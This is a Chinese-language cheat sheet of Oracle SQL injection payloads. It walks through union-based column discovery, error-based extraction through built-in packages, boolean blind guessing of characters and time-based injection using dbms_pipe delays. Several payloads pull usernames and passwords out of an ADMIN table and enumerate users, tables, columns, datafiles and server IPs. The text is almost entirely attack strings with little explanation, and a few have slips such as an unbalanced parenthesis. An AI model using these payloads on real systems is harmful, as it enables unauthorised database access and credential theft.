注释符:
–空格,/*多行注释*/
联合查询注入:
‘ order by 5 #通过order by判断字段数。
oracle对数据类型比较敏感,所以可以使用null,来兼容任何类型。
‘ union select null,null,null,null,null from dual
然后再把显示位替换为查询敏感信息的SQL语句即可,比如:
’ union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual
列出一些可用的查询语句:
1 当前用户权限 (select * from session_roles)
2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用utl_http.request 可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统 (select member from v$logfile where rownum=1)
6 服务器sid (select instance_name from v$instance)
7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
6 当前用户 (SELECT user FROM dual)查库名:
union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual
union select null,null,(select owner from all_tables where rownum=1 and owner not in (‘SYS’)),null,null,null,null,null from dual
查表:
union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual
union select null,null,(select table_name from user_tables where rownum=1 and table_name not in (‘ADMIN’)),null,null,null,null,null from dual
查字段(表名大写):
union select null,(select column_name from user_tab_columns where table_name=’表名’ and rownum=1),null,null,null,null,null,null from dual
union select null,(select column_name from user_tab_columns where table_name=’表名’ and column_name not in (‘ID’) and rownum=1),null,null,null,null,null,null from dual
查数据:
union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual
union select null,(SELECT USERNAME||’:’||PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual #||需要url编码
扩展
当前用户:
SELECT user FROM dual;
列出所有用户:
SELECT username FROM all_users ORDER BY username;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
查询表所有列
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
定位文件
SELECT name FROM V$DATAFILE;报错注入:
and 1=utl_inaddr.get_host_name((select user from dual))–+
and 1=ctxsys.drithsx.sn(1,(select user from dual))–+
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null –+
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null –+
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null –+
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null –+
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null –+
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–+
and 1=(select decode(substr(user,1,1),’S’,(1/0),0) from dual) –+
and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))–+
布尔型盲注:
获取长度:
and 6=(select length(user) from dual) –+
判断指定位置的字符:
and 1=(select decode(substr(user,1,1),’S’,1,0) from dual) –+
获取指定表指定字段的内容:
and 1=(select decode(substr((select 字段一||字段二 from 表名),1,1),’a’,1,0) from dual)
不使用decode:
and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97
可使用burpsuite爆破
延时注入:
DBMS_PIPE.RECEIVE_MESSAGE函数将为从RDS管道返回的数据等待10秒。默认情况下,允许以public权限执行该包。DBMS_LOCK.SLEEP()与之相反,它是一个可以用在SQL语句中的函数。
判断注入点:
and 1=dbms_pipe.receive_message(‘RDS’, 10)–+
在decode的
基础上加上延时:
and 1=(select decode(substr(user,1,1),’S’,dbms_pipe.receive_message(‘RDS’,10),0) from dual) –+
and 1=(select decode(length(user),6,dbms_pipe.receive_message(‘RDS’,10),0) from dual)–+
and 1=(select decode(substr(user,1,1),’S’,dbms_pipe.receive_message(‘RDS’,10),0) from dual) –+